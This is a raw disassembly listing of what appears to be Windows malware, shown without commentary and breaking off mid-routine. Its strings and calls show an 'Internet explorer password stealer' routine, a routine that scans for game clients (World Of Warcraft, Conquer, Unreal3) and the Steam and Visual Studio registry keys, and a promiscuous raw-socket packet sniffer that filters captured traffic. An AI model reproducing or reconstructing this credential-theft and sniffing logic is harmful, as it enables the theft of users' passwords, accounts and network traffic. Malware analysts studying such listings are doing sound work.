mov [ebp-10h], ebx
mov [ebp+0Bh], al
mov [ebp-0F4h], bl
loc_40F61D: ; CODE XREF: sub_40F54D+6E2�j
; sub_40F54D+6EE�j
cmp [ebp-1Ch], ebx
jnz short loc_40F62C
push 80004003h
call sub_410B60
loc_40F62C: ; CODE XREF: sub_40F54D+D3�j
mov eax, [ebp-1Ch]
lea edx, [ebp-40h]
push ebx
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_40FC40
mov eax, [ebp-290h]
cmp [eax+4], ebx
jnz loc_40FC40
sub esp, 10h
lea esi, [ebp-40h]
mov edi, esp
lea eax, [ebp-84h]
movsd
movsd
movsd
push offset asc_4172B0 ; "%x"
push eax
movsd
call ds:dword_4111EC ; wsprintfA
add esp, 18h
cmp [ebp-14h], ebx
mov byte ptr [ebp-4], 2
mov [ebp-24h], ebx
jnz short loc_40F68A
push 80004003h
call sub_410B60
loc_40F68A: ; CODE XREF: sub_40F54D+131�j
mov esi, [ebp-14h]
lea ecx, [ebp-24h]
push ecx
lea ecx, [ebp-40h]
mov eax, [esi]
push ebx
push ecx
push ebx
push esi
call dword ptr [eax+3Ch]
cmp eax, ebx
jge short loc_40F6AD
push offset dword_4172E8
push esi
push eax
call sub_410B6E
loc_40F6AD: ; CODE XREF: sub_40F54D+152�j
; sub_40F54D+6C8�j ...
cmp [ebp-24h], ebx
jnz short loc_40F6BC
push 80004003h
call sub_410B60
loc_40F6BC: ; CODE XREF: sub_40F54D+163�j
mov eax, [ebp-24h]
lea edx, [ebp-50h]
push ebx
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_40FC26
cmp [ebp-14h], ebx
mov byte ptr [ebp-4], 3
mov [ebp-28h], ebx
jnz short loc_40F6EA
push 80004003h
call sub_410B60
loc_40F6EA: ; CODE XREF: sub_40F54D+191�j
mov esi, [ebp-14h]
lea ecx, [ebp-28h]
push ecx
lea ecx, [ebp-50h]
mov eax, [esi]
push ebx
push ecx
lea ecx, [ebp-40h]
push ecx
push ebx
push esi
call dword ptr [eax+54h]
cmp eax, ebx
jge short loc_40F711
push offset dword_4172E8
push esi
push eax
call sub_410B6E
loc_40F711: ; CODE XREF: sub_40F54D+1B6�j
; sub_40F54D+6BA�j
cmp [ebp-28h], ebx
jnz short loc_40F720
push 80004003h
call sub_410B60
loc_40F720: ; CODE XREF: sub_40F54D+1C7�j
mov eax, [ebp-28h]
lea edx, [ebp-30h]
push ebx
push edx
mov ecx, [eax]
push 1
push eax
call dword ptr [ecx+0Ch]
test eax, eax
jnz loc_40FC0C
push dword ptr [ebp-30h]
mov edi, ds:dword_4111EC
lea eax, [ebp-7BCh]
push offset aWs ; "%ws"
push eax
call edi ; wsprintfA
add esp, 0Ch
cmp [ebp-14h], ebx
mov [ebp-20h], ebx
mov [ebp-18h], ebx
jnz short loc_40F767
push 80004003h
call sub_410B60
loc_40F767: ; CODE XREF: sub_40F54D+20E�j
push ebx
lea ecx, [ebp-18h]
push ebx
push ecx
mov esi, [ebp-14h]
lea ecx, [ebp-20h]
push ecx
lea ecx, [ebp-50h]
push dword ptr [ebp-30h]
mov eax, [esi]
push ecx
lea ecx, [ebp-40h]
push ecx
push ebx
push esi
call dword ptr [eax+44h]
cmp eax, ebx
jge short loc_40F796
push offset dword_4172E8
push esi
push eax
call sub_410B6E
loc_40F796: ; CODE XREF: sub_40F54D+23B�j
push dword ptr [ebp-18h]
call sub_410826 ; strlen
mov esi, [ebp-20h]
pop ecx
lea ecx, [esi-1]
cmp eax, ecx
jnb short loc_40F7DC
xor ecx, ecx
xor edx, edx
cmp esi, ebx
jbe short loc_40F7D3
loc_40F7B1: ; CODE XREF: sub_40F54D+284�j
mov eax, [ebp-18h]
mov al, [edx+eax]
cmp al, bl
jnz short loc_40F7C5
mov byte ptr [ebp+ecx-5BCh], 2Ch
jmp short loc_40F7CC
; ---------------------------------------------------------------------------
loc_40F7C5: ; CODE XREF: sub_40F54D+26C�j
mov [ebp+ecx-5BCh], al
loc_40F7CC: ; CODE XREF: sub_40F54D+276�j
inc ecx
inc edx
inc edx
cmp edx, esi
jb short loc_40F7B1
loc_40F7D3: ; CODE XREF: sub_40F54D+262�j
mov [ebp+ecx-5BDh], bl
jmp short loc_40F7F0
; ---------------------------------------------------------------------------
loc_40F7DC: ; CODE XREF: sub_40F54D+25A�j
push dword ptr [ebp-18h]
lea eax, [ebp-5BCh]
push offset dword_412B30
push eax
call edi ; wsprintfA
add esp, 0Ch
loc_40F7F0: ; CODE XREF: sub_40F54D+28D�j
mov esi, ds:dword_411104
mov edi, offset byte_417B60
lea eax, [ebp-0FA4h]
push edi
push eax
call esi ; lstrcpy
lea eax, [ebp-9BCh]
push edi
push eax
call esi ; lstrcpy
mov esi, ds:dword_411110
lea eax, [ebp-84h]
push offset a220d5cc1 ; "220d5cc1"
push eax
call esi ; lstrcmp
test eax, eax
jnz short loc_40F857
inc dword ptr [ebp-10h]
cmp [ebp-0F7h], bl
jnz short loc_40F857
lea eax, [ebp-5BCh]
push eax
lea eax, [ebp-7BCh]
push eax
lea eax, [ebp-28Ch]
push dword ptr [ebp-10h]
push offset dword_417260
push eax
call sub_408D50
add esp, 14h
loc_40F857: ; CODE XREF: sub_40F54D+2D8�j
; sub_40F54D+2E3�j
lea eax, [ebp-84h]
push offset a5e7e8100 ; "5e7e8100"
push eax
call esi ; lstrcmp
test eax, eax
jnz loc_40F8FE
mov edi, ds:dword_411104
lea eax, [ebp-358h]
push offset byte_417B60
push eax
call edi ; lstrcpy
mov esi, offset asc_412528 ; ":"
lea eax, [ebp-5BCh]
push esi
push eax
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40F8C4
lea eax, [ebp-5BCh]
push esi
push eax
call sub_410898 ; strstr
pop ecx
inc eax
pop ecx
push eax
lea eax, [ebp-358h]
push eax
call edi ; lstrcpy
lea eax, [ebp-5BCh]
push esi
push eax
call sub_410898 ; strstr
pop ecx
mov [eax], bl
pop ecx
loc_40F8C4: ; CODE XREF: sub_40F54D+34A�j
inc dword ptr [ebp-10h]
push 3E8h
call ds:dword_4110A4 ; Sleep
lea eax, [ebp-358h]
push eax
lea eax, [ebp-5BCh]
push eax
lea eax, [ebp-7BCh]
push eax
lea eax, [ebp-28Ch]
push dword ptr [ebp-10h]
push offset dword_4171FC
push eax
call sub_408D50
add esp, 18h
loc_40F8FE: ; CODE XREF: sub_40F54D+31A�j
lea eax, [ebp-84h]
push offset aB9819c52 ; "b9819c52"
push eax
call ds:dword_411110 ; lstrcmp
test eax, eax
jnz loc_40FA6C
mov eax, [ebp-18h]
xor edi, edi
xor esi, esi
cmp [ebp-20h], ebx
jbe short loc_40F967
loc_40F924: ; CODE XREF: sub_40F54D+418�j
mov cl, [esi+eax]
cmp cl, bl
jnz short loc_40F935
mov byte ptr [ebp+edi-5BCh], 2Ch
jmp short loc_40F95F
; ---------------------------------------------------------------------------
loc_40F935: ; CODE XREF: sub_40F54D+3DC�j
push ecx
call ds:dword_411200 ; IsCharAlphaNumericA
test eax, eax
mov eax, [ebp-18h]
jnz short loc_40F955
mov cl, [esi+eax]
cmp cl, 40h
jz short loc_40F955
cmp cl, 2Eh
jz short loc_40F955
cmp cl, 5Fh
jnz short loc_40F960
loc_40F955: ; CODE XREF: sub_40F54D+3F4�j
; sub_40F54D+3FC�j ...
mov cl, [esi+eax]
mov [ebp+edi-5BCh], cl
loc_40F95F: ; CODE XREF: sub_40F54D+3E6�j
inc edi
loc_40F960: ; CODE XREF: sub_40F54D+406�j
inc esi
inc esi
cmp esi, [ebp-20h]
jb short loc_40F924
loc_40F967: ; CODE XREF: sub_40F54D+3D5�j
mov [ebp+edi-5BDh], bl
cmp [eax+4], bl
lea esi, [ebp-5BAh]
mov [ebp-2Ch], ebx
jbe loc_40FA6C
loc_40F980: ; CODE XREF: sub_40F54D+519�j
inc esi
lea eax, [ebp-3BCh]
push esi
push eax
call ds:dword_411104 ; lstrcpy
mov edi, offset dword_4171EC
lea eax, [ebp-3BCh]
push edi
push eax
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40F9B8
lea eax, [ebp-3BCh]
push edi
push eax
call sub_410898 ; strstr
pop ecx
mov [eax], bl
pop ecx
loc_40F9B8: ; CODE XREF: sub_40F54D+458�j
push edi
push esi
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40F9DE
push edi
push esi
call sub_410898 ; strstr
pop ecx
inc eax
pop ecx
inc eax
push eax
lea eax, [ebp-0E8h]
push eax
call ds:dword_411104 ; lstrcpy
loc_40F9DE: ; CODE XREF: sub_40F54D+476�j
lea eax, [ebp-0E8h]
push edi
push eax
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40FA02
lea eax, [ebp-0E8h]
push edi
push eax
call sub_410898 ; strstr
pop ecx
mov [eax], bl
pop ecx
loc_40FA02: ; CODE XREF: sub_40F54D+4A2�j
push edi
push esi
call sub_410898 ; strstr
pop ecx
mov esi, eax
pop ecx
lea eax, [ebp-0E8h]
push eax
call ds:dword_411040 ; lstrlen
inc dword ptr [ebp-10h]
push 3E8h
lea esi, [esi+eax+9]
call ds:dword_4110A4 ; Sleep
cmp [ebp-0F7h], bl
jnz short loc_40FA59
lea eax, [ebp-0E8h]
push eax
lea eax, [ebp-3BCh]
push eax
lea eax, [ebp-28Ch]
push dword ptr [ebp-10h]
push offset dword_4171AC
push eax
call sub_408D50
add esp, 14h
loc_40FA59: ; CODE XREF: sub_40F54D+4E5�j
mov eax, [ebp-18h]
inc dword ptr [ebp-2Ch]
movzx eax, byte ptr [eax+4]
cmp [ebp-2Ch], eax
jl loc_40F980
loc_40FA6C: ; CODE XREF: sub_40F54D+3C5�j
; sub_40F54D+42D�j
lea eax, [ebp-84h]
push offset aE161255a ; "e161255a"
push eax
call ds:dword_411110 ; lstrcmp
test eax, eax
jnz loc_40FBE3
lea eax, [ebp-7BCh]
push offset aStringindex ; "StringIndex"
push eax
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jnz loc_40FBE3
mov esi, offset dword_41718C
lea eax, [ebp-7BCh]
push esi
push eax
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40FACA
lea eax, [ebp-7BCh]
push esi
push eax
call sub_410898 ; strstr
pop ecx
mov [eax], bl
pop ecx
loc_40FACA: ; CODE XREF: sub_40F54D+56A�j
lea eax, [ebp-7BCh]
push 8
push eax
lea eax, [ebp-358h]
push eax
call ds:dword_411108 ; lstrcpyn
lea eax, [ebp-358h]
push offset dword_417184
push eax
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_40FB52
lea eax, [ebp-358h]
push offset dword_41717C
push eax
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_40FB52
inc dword ptr [ebp-10h]
push 3E8h
call ds:dword_4110A4 ; Sleep
cmp [ebp-0F7h], bl
jnz loc_40FBE3
lea eax, [ebp-5BCh]
push eax
lea eax, [ebp-7BCh]
push eax
lea eax, [ebp-28Ch]
push dword ptr [ebp-10h]
push offset dword_417134
push eax
call sub_408D50
add esp, 14h
jmp loc_40FBE3
; ---------------------------------------------------------------------------
loc_40FB52: ; CODE XREF: sub_40F54D+5A8�j
; sub_40F54D+5BF�j
mov edi, ds:dword_411104
lea eax, [ebp-358h]
push offset byte_417B60
push eax
call edi ; lstrcpy
mov esi, offset dword_4171EC
lea eax, [ebp-5BCh]
push esi
push eax
call sub_410898 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_40FBA9
lea eax, [ebp-5BCh]
push esi
push eax
call sub_410898 ; strstr
pop ecx
inc eax
pop ecx
push eax
lea eax, [ebp-358h]
push eax
call edi ; lstrcpy
lea eax, [ebp-5BCh]
push esi
push eax
call sub_410898 ; strstr
pop ecx
mov [eax], bl
pop ecx
loc_40FBA9: ; CODE XREF: sub_40F54D+62F�j
inc dword ptr [ebp-10h]
push 3E8h
call ds:dword_4110A4 ; Sleep
lea eax, [ebp-358h]
push eax
lea eax, [ebp-5BCh]
push eax
lea eax, [ebp-7BCh]
push eax
lea eax, [ebp-28Ch]
push dword ptr [ebp-10h]
push offset dword_4170D8
push eax
call sub_408D50
add esp, 18h
loc_40FBE3: ; CODE XREF: sub_40F54D+533�j
; sub_40F54D+54E�j ...
mov esi, 200h
lea eax, [ebp-7BCh]
push esi
push ebx
push eax
call sub_410850 ; memset
push esi
lea eax, [ebp-5BCh]
push ebx
push eax
call sub_410850 ; memset
add esp, 18h
jmp loc_40F711
; ---------------------------------------------------------------------------
loc_40FC0C: ; CODE XREF: sub_40F54D+1E5�j
mov eax, [ebp-28h]
mov byte ptr [ebp-4], 2
cmp eax, ebx
jz loc_40F6AD
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_40F6AD
; ---------------------------------------------------------------------------
loc_40FC26: ; CODE XREF: sub_40F54D+181�j
mov eax, [ebp-24h]
mov byte ptr [ebp-4], 1
cmp eax, ebx
jz loc_40F61D
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
jmp loc_40F61D
; ---------------------------------------------------------------------------
loc_40FC40: ; CODE XREF: sub_40F54D+F1�j
; sub_40F54D+100�j
mov al, [ebp+0Bh]
push 3E8h
mov [ebp-0F4h], al
call ds:dword_4110A4 ; Sleep
push dword ptr [ebp-10h]
mov eax, [ebp-290h]
push dword ptr [eax]
lea eax, [ebp-28Ch]
push offset unk_41709C
push eax
call sub_408D50
push dword ptr [ebp-290h]
call sub_406753
add esp, 14h
loc_40FC7E: ; CODE XREF: sub_40F54D+9D�j
mov eax, [ebp-1Ch]
mov [ebp-4], bl
cmp eax, ebx
jz short loc_40FC8E
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40FC8E: ; CODE XREF: sub_40F54D+57�j
; sub_40F54D+739�j
mov eax, [ebp-14h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp eax, ebx
jz short loc_40FC9F
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40FC9F: ; CODE XREF: sub_40F54D+74A�j
mov ecx, [ebp-0Ch]
pop edi
pop esi
xor eax, eax
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40F54D endp
; =============== S U B R O U T I N E =======================================
sub_40FCB2 proc near ; CODE XREF: sub_40735A+6C�p
arg_0 = dword ptr 4
cmp dword_417BB0, 0
push esi
jz short loc_40FCF1
push 1A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40FCF1
push [esp+4+arg_0]
lea eax, [esi+4]
push eax
call sub_403E60
pop ecx
pop ecx
push offset aInternetExplor ; "Internet explorer password stealer"
push 0
push esi
push offset sub_40F54D
call sub_40663C
add esp, 10h
loc_40FCF1: ; CODE XREF: sub_40FCB2+8�j
; sub_40FCB2+19�j
pop esi
retn
sub_40FCB2 endp
; ---------------------------------------------------------------------------
loc_40FCF3: ; CODE XREF: seg000:00410CD3�j
; seg000:00410CDB�j ...
mov eax, [ecx]
test eax, eax
jz short locret_40FCFF
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
locret_40FCFF: ; CODE XREF: seg000:0040FCF7�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FD00 proc near ; DATA XREF: sub_40FEA2+29�o
var_5BC = byte ptr -5BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_20 = byte ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5BCh
push ebx
push esi
push edi
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1BC]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
xor esi, esi
add esp, 10h
mov [ebp+var_8], esi
mov [ebp+var_C], esi
mov [ebp+var_10], esi
mov [ebp+var_14], esi
mov [ebp+arg_0], esi
xor ebx, ebx
loc_40FD3E: ; CODE XREF: sub_40FD00+AC�j
lea eax, [ebp+var_5BC]
push 400h
push eax
push ebx
call ds:dword_4111F0 ; GetWindowTextA
push 7
lea eax, [ebp+var_5BC]
push offset aUnreal3 ; "Unreal3"
push eax
call sub_410CA0 ; _strnicmp
add esp, 0Ch
test eax, eax
push 1
pop edi
jnz short loc_40FD71
mov [ebp+var_C], edi
loc_40FD71: ; CODE XREF: sub_40FD00+6C�j
lea eax, [ebp+var_5BC]
push offset aWorldOfWarcraf ; "World Of Warcraft"
push eax
call sub_410AEE ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40FD8B
mov [ebp+var_14], edi
loc_40FD8B: ; CODE XREF: sub_40FD00+86�j
lea eax, [ebp+var_5BC]
push offset aConquer ; "[Conquer]"
push eax
call sub_410AEE ; strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40FDA5
mov [ebp+arg_0], edi
loc_40FDA5: ; CODE XREF: sub_40FD00+A0�j
inc ebx
cmp ebx, 0FFFFh
jb short loc_40FD3E
mov edi, ds:dword_411000
lea eax, [ebp+var_4]
mov ebx, 20019h
push eax
push ebx
push esi
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Set"...
push 80000002h
mov [ebp+var_4], esi
call edi ; RegOpenKeyExA
test eax, eax
jnz short loc_40FDD9
mov [ebp+var_8], 1
loc_40FDD9: ; CODE XREF: sub_40FD00+D0�j
push [ebp+var_4]
mov esi, ds:dword_411028
call esi ; RegCloseKey
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push ebx
push 0
push offset aSoftwareValveS ; "Software\\Valve\\Steam"
push 80000001h
call edi ; RegOpenKeyExA
test eax, eax
jnz short loc_40FE06
mov [ebp+var_10], 1
loc_40FE06: ; CODE XREF: sub_40FD00+FD�j
push [ebp+var_4]
call esi ; RegCloseKey
cmp [ebp+var_20], 0
mov eax, offset aNo ; "No"
mov ecx, offset aYes ; "Yes"
jz short loc_40FE44
xor edx, edx
cmp [ebp+var_C], edx
jnz short loc_40FE46
cmp [ebp+var_8], edx
jnz short loc_40FE46
cmp [ebp+var_10], edx
jnz short loc_40FE46
cmp [ebp+var_14], edx
jnz short loc_40FE46
cmp [ebp+arg_0], edx
jnz short loc_40FE4B
push [ebp+var_1BC]
call sub_406753
pop ecx
jmp short loc_40FE99
; ---------------------------------------------------------------------------
loc_40FE44: ; CODE XREF: sub_40FD00+119�j
xor edx, edx
loc_40FE46: ; CODE XREF: sub_40FD00+120�j
; sub_40FD00+125�j ...
cmp [ebp+arg_0], edx
jz short loc_40FE4F
loc_40FE4B: ; CODE XREF: sub_40FD00+134�j
mov ebx, ecx
jmp short loc_40FE51
; ---------------------------------------------------------------------------
loc_40FE4F: ; CODE XREF: sub_40FD00+149�j
mov ebx, eax
loc_40FE51: ; CODE XREF: sub_40FD00+14D�j
cmp [ebp+var_14], edx
mov edi, ecx
jnz short loc_40FE5A
mov edi, eax
loc_40FE5A: ; CODE XREF: sub_40FD00+156�j
cmp [ebp+var_10], edx
mov esi, ecx
jnz short loc_40FE63
mov esi, eax
loc_40FE63: ; CODE XREF: sub_40FD00+15F�j
cmp [ebp+var_8], 0
mov edx, ecx
jnz short loc_40FE6D
mov edx, eax
loc_40FE6D: ; CODE XREF: sub_40FD00+169�j
cmp [ebp+var_C], 0
jz short loc_40FE75
mov eax, ecx
loc_40FE75: ; CODE XREF: sub_40FD00+171�j
push ebx
push edi
push esi
push edx
push eax
lea eax, [ebp+var_1B8]
push offset dword_41731C
push eax
call sub_408D50
push [ebp+var_1BC]
call sub_406753
add esp, 20h
loc_40FE99: ; CODE XREF: sub_40FD00+142�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_40FD00 endp
; =============== S U B R O U T I N E =======================================
sub_40FEA2 proc near ; CODE XREF: sub_40735A+925�p
arg_0 = dword ptr 4
push esi
push 1A7h
call sub_41082C ; malloc
mov esi, eax
pop ecx
test esi, esi
jz short loc_40FED8
push [esp+4+arg_0]
lea eax, [esi+4]
push eax
call sub_403E60
pop ecx
pop ecx
push offset aListingInteres ; "Listing interesting processes"
push 0
push esi
push offset sub_40FD00
call sub_40663C
add esp, 10h
loc_40FED8: ; CODE XREF: sub_40FEA2+10�j
pop esi
retn
sub_40FEA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FEDA proc near ; CODE XREF: sub_40FF2A+32�p
; sub_40FF2A+4A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
cmp dword ptr [eax], 0
jz short loc_40FF20
mov esi, eax
loc_40FEE8: ; CODE XREF: sub_40FEDA+44�j
push dword ptr [eax]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4052F1
add esp, 0Ch
test eax, eax
jz short loc_40FF16
mov eax, [esi+4]
test eax, eax
jz short loc_40FF25
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_4052F1
add esp, 0Ch
test eax, eax
jz short loc_40FF25
loc_40FF16: ; CODE XREF: sub_40FEDA+20�j
add esi, 8
mov eax, esi
cmp dword ptr [esi], 0
jnz short loc_40FEE8
loc_40FF20: ; CODE XREF: sub_40FEDA+A�j
xor eax, eax
loc_40FF22: ; CODE XREF: sub_40FEDA+4E�j
pop esi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40FF25: ; CODE XREF: sub_40FEDA+27�j
; sub_40FEDA+3A�j
push 1
pop eax
jmp short loc_40FF22
sub_40FEDA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FF2A proc near ; CODE XREF: sub_40FFBC+29B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, [ebp+arg_0]
jz short loc_40FF4D
push [ebp+arg_C]
push esi
push edi
call sub_4052F1
add esp, 0Ch
test eax, eax
jnz short loc_40FFB0
loc_40FF4D: ; CODE XREF: sub_40FF2A+10�j
mov ebx, [ebp+arg_8]
cmp ebx, 1
jb short loc_40FF68
push esi
push edi
push offset off_41744C
call sub_40FEDA
add esp, 0Ch
test eax, eax
jnz short loc_40FFB0
loc_40FF68: ; CODE XREF: sub_40FF2A+29�j
cmp ebx, 2
jb short loc_40FF80
push esi
push edi
push offset off_4174A8
call sub_40FEDA
add esp, 0Ch
test eax, eax
jnz short loc_40FFB0
loc_40FF80: ; CODE XREF: sub_40FF2A+41�j
cmp ebx, 3
jb short loc_40FF98
push esi
push edi
push offset off_41751C
call sub_40FEDA
add esp, 0Ch
test eax, eax
jnz short loc_40FFB0
loc_40FF98: ; CODE XREF: sub_40FF2A+59�j
cmp ebx, 4
jb short loc_40FFB5
push esi
push edi
push offset off_417560
call sub_40FEDA
add esp, 0Ch
test eax, eax
jz short loc_40FFB5
loc_40FFB0: ; CODE XREF: sub_40FF2A+21�j
; sub_40FF2A+3C�j ...
push 1
pop eax
jmp short loc_40FFB7
; ---------------------------------------------------------------------------
loc_40FFB5: ; CODE XREF: sub_40FF2A+71�j
; sub_40FF2A+84�j
xor eax, eax
loc_40FFB7: ; CODE XREF: sub_40FF2A+89�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_40FF2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40FFBC proc near ; DATA XREF: sub_41041B+76�o
var_199C = byte ptr -199Ch
var_1993 = byte ptr -1993h
var_1990 = dword ptr -1990h
var_198C = dword ptr -198Ch
var_970 = byte ptr -970h
var_870 = byte ptr -870h
var_770 = byte ptr -770h
var_670 = byte ptr -670h
var_4F0 = byte ptr -4F0h
var_4EF = byte ptr -4EFh
var_3F0 = dword ptr -3F0h
var_3EC = dword ptr -3ECh
var_3E8 = byte ptr -3E8h
var_1E8 = byte ptr -1E8h
var_5A = byte ptr -5Ah
var_54 = byte ptr -54h
var_50 = byte ptr -50h
var_44 = byte ptr -44h
var_40 = word ptr -40h
var_3C = dword ptr -3Ch
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 199Ch
call sub_4108B0
push ebx
push esi
push edi
push 3ABh
push [ebp+arg_0]
lea eax, [ebp+var_3F0]
push eax
call sub_410838 ; memcpy
push [ebp+arg_0]
call sub_410832 ; free
mov al, [ebp+var_3E8]
add esp, 10h
neg al
sbb eax, eax
xor ebx, ebx
lea ecx, [ebp+var_3E8]
push ebx
and eax, ecx
push 3
push 2
mov [ebp+var_24], eax
call ds:dword_41122C ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
mov [ebp+var_C], esi
jz loc_410406
lea eax, [ebp+var_970]
push 0FFh
push eax
call ds:dword_411270 ; gethostname
lea eax, [ebp+var_970]
push eax
call ds:dword_41124C ; gethostbyname
mov edi, eax
cmp edi, ebx
jz loc_4103FF
push 10h
lea eax, [ebp+var_40]
push ebx
push eax
call sub_410850 ; memset
mov [ebp+var_40], 2
mov eax, [edi+0Ch]
add esp, 0Ch
loc_41005C: ; DATA XREF: .data:off_414814�o
mov eax, [eax]
push 10h
mov eax, [eax]
mov [ebp+var_3C], eax
lea eax, [ebp+var_40]
push eax
push esi
call ds:dword_41121C ; bind
cmp eax, 0FFFFFFFFh
jz loc_4103FF
push ebx
lea eax, [ebp+var_44]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_28]
push 4
push eax
push 98000001h
push esi
mov [ebp+var_28], 1
call ds:dword_41126C ; WSAIoctl
cmp eax, 0FFFFFFFFh
jz loc_4103FF
push [ebp+var_3EC]
mov eax, [ebp+var_3F0]
push dword ptr [eax]
lea eax, [ebp+var_1E8]
push offset unk_41772C
push eax
call sub_408D50
add esp, 10h
xor eax, eax
lea edi, [ebp+var_4EF]
mov [ebp+var_4F0], bl
push 3Fh
mov [ebp+var_14], bl
pop ecx
mov [ebp+var_50], bl
rep stosd
stosw
stosb
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosb
lea eax, [ebp+var_4F0]
push eax
call sub_40882C
push eax
call sub_403495
pop ecx
lea eax, [ebp+var_14]
pop ecx
push eax
call sub_40882C
push eax
call sub_403536
pop ecx
lea eax, [ebp+var_4F0]
pop ecx
push eax
call ds:dword_411254 ; inet_addr
mov [ebp+var_20], eax
lea eax, [ebp+var_14]
push eax
call sub_41088C ; atoi
mov [ebp+var_30], eax
xor eax, eax
lea edi, [ebp+var_1B]
mov [ebp+var_1C], bl
stosd
stosb
pop ecx
lea eax, [ebp+var_1C]
push eax
call sub_40882C
push eax
call sub_4034E7
mov eax, [ebp+var_3C]
mov [ebp+var_8], eax
lea eax, [ebp+var_1C]
push eax
call sub_41088C ; atoi
add esp, 0Ch
mov [ebp+var_2C], eax
loc_410158: ; CODE XREF: sub_40FFBC+1F3�j
; sub_40FFBC+43B�j
push ebx
lea eax, [ebp+var_199C]
push 1028h
push eax
push esi
call ds:dword_411258 ; recv
mov ecx, [ebp+var_3F0]
cmp [ecx+4], ebx
jnz loc_4103FF
cmp eax, 0FFFFFFFFh
jz loc_4103FF
cmp eax, ebx
jz loc_4103FF
mov [ebp+eax+var_199C], bl
mov cl, [ebp+var_199C]
and ecx, 0Fh
lea edx, [ebp+var_199C]
lea edi, [ebp+ecx*4+var_199C]
mov ecx, edi
sub ecx, edx
cmp ecx, eax
jnb short loc_410158
movzx ecx, byte ptr [edi+0Ch]
shr ecx, 4
lea edx, [ebp+var_199C]
lea esi, [edi+ecx*4]
mov ecx, esi
sub ecx, edx
cmp ecx, eax
jnb loc_4103F4
push esi
call sub_410826 ; strlen
cmp [ebp+var_1993], 6
pop ecx
mov [ebp+arg_0], eax
jnz loc_4103F4
cmp [ebp+var_5A], bl
jz short loc_4101F8
mov eax, [ebp+var_8]
cmp [ebp+var_198C], eax
jnz loc_4103F4
loc_4101F8: ; CODE XREF: sub_40FFBC+22B�j
cmp [ebp+var_54], bl
jz short loc_41020C
mov eax, [ebp+var_8]
cmp [ebp+var_1990], eax
jnz loc_4103F4
loc_41020C: ; CODE XREF: sub_40FFBC+23F�j
mov ax, [edi]
push eax
call ds:dword_411248 ; htons
cmp ax, word ptr [ebp+var_2C]
jnz short loc_41022B
mov eax, [ebp+var_8]
cmp [ebp+var_1990], eax
jz loc_4103F4
loc_41022B: ; CODE XREF: sub_40FFBC+25E�j
mov ax, [edi]
push eax
call ds:dword_411248 ; htons
cmp ax, word ptr [ebp+var_30]
jnz short loc_41024A
mov eax, [ebp+var_20]
cmp [ebp+var_1990], eax
jz loc_4103F4
loc_41024A: ; CODE XREF: sub_40FFBC+27D�j
push [ebp+var_24]
push [ebp+var_3EC]
push [ebp+arg_0]
push esi
call sub_40FF2A
add esp, 10h
test eax, eax
jz loc_4103F4
xor ecx, ecx
cmp [ebp+arg_0], ebx
jbe short loc_41028F
loc_41026E: ; CODE XREF: sub_40FFBC+2D1�j
cmp byte ptr [ecx+esi], 0Dh
lea eax, [ecx+esi]
jnz short loc_41027A
mov byte ptr [eax], 2Dh
loc_41027A: ; CODE XREF: sub_40FFBC+2B9�j
cmp byte ptr [eax], 0Ah
jnz short loc_410282
